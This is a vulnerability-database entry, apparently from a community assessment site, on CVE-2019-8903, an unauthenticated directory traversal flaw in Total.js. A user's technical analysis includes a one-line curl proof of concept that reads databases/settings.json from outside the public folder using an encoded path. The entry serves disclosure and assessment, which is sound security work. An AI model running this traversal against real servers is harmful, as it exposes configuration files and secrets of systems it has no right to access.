Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

Total.js requestcontinue Directory Traversal Vulnerability

Disclosure Date: February 18, 2019 Last updated November 13, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.

Add Assessment

2
Ratings
Technical Analysis

Totaljs – Unathenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json 

#(note that .json is in the extensions list by def.)

General Information

Additional Info

Technical Analysis